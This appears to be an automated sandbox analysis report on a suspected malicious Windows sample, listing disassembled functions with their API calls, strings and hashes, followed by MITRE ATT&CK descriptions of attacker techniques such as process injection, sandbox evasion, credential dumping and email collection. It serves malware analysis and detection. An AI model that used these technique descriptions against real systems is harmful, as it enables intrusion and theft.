Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Part of subcall function 00405663: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
Opcode Fuzzy Hash: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A

Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405135
CallWindowProcW.USER32(?,?,?,?), ref: 00405186

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Strings

, xrefs: 00405116

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A

Function 00405B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405BA1
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403356,00436000,00436800), ref: 00405BBC

Strings

nsa, xrefs: 00405B90

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64

Function 39048498 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 39048757
$^q, xrefs: 39048763
$^q, xrefs: 390486F2
$^q, xrefs: 390486FE

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: a59ec1500bb3a057b0c7e458718f37cba2bd95e94ad133a2c1413d9473e84a55
Instruction ID: ded6299056c6f152490b71f392ea8ff9cf2a02f35464ef5b7c9c2c32f1c5a63c
Opcode Fuzzy Hash: a59ec1500bb3a057b0c7e458718f37cba2bd95e94ad133a2c1413d9473e84a55
Instruction Fuzzy Hash: 20B11B34A00209CFDB18EB69C59469EB7F2AF88340F248D79D805AB355DB75EC86CF81

Function 00405663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
CloseHandle.KERNEL32(?), ref: 00405695

Strings

Error launching installer, xrefs: 00405676

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 0040638E Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 390488B0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR^q, xrefs: 390489A3
$^q, xrefs: 3904892F
LR^q, xrefs: 390489F2
$^q, xrefs: 3904893B

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 6cf792bd3e2f9c2110863a5df73241b7ceaa5442dfe981156dc78557ed332a36
Instruction ID: 73b1de2ee1895b1620200d9b3773a65ce1a61962a4908885cd03aeb422f2ce48
Opcode Fuzzy Hash: 6cf792bd3e2f9c2110863a5df73241b7ceaa5442dfe981156dc78557ed332a36
Instruction Fuzzy Hash: 2051C0307002019FDB08DB28C995A5AB7F2FF88340F148DB9E915AB395DB30EC45CB92

Function 3904AD88 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

$^q, xrefs: 3904AF0C
$^q, xrefs: 3904AEB9
$^q, xrefs: 3904AF64
$^q, xrefs: 3904AF3B

Memory Dump Source

Source File: 00000004.00000002.2937320369.0000000039040000.00000040.00000800.00020000.00000000.sdmp, Offset: 39040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_39040000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: f58c49ca2a4cf9d5aad1d1b68d756bb7221f67485e629a3eac235d3b2daf97c0
Instruction ID: 6411d41d90cdf5f7c9b2460794a0c8c134538319cfd135eecab088f7095aae7d
Opcode Fuzzy Hash: f58c49ca2a4cf9d5aad1d1b68d756bb7221f67485e629a3eac235d3b2daf97c0
Instruction Fuzzy Hash: F951AF78A00204DFEB15DAA4C48269EB7F2EB88351F1089B9D416FB355DB30EC46CF91

Function 00405AB9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

Memory Dump Source

Source File: 00000004.00000002.2915675471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2915663573.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915687816.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915699697.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2915718844.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
